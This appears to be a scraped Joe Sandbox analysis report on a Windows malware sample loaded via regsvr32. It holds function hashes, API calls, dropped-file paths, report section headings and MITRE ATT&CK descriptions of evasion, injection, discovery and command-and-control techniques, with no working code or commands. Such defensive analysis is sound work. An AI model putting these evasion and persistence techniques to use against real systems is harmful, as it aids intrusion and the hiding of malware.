Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015E2C Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 0000000180015F50

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019A30 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 0000000180019B4B

Memory Dump Source

Source File: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report auExrOTnvB

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
auExrOTnvB

Function 00570000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094
memoryCOMMON

Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370
COMMON

Function 0000000180007958 Relevance: 9.3, Strings: 7, Instructions: 551
COMMON

Function 0000000180010FF4 Relevance: 9.1, Strings: 7, Instructions: 363
COMMON

Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266
COMMON

Function 0000000180028C20 Relevance: 6.6, Strings: 5, Instructions: 335
COMMON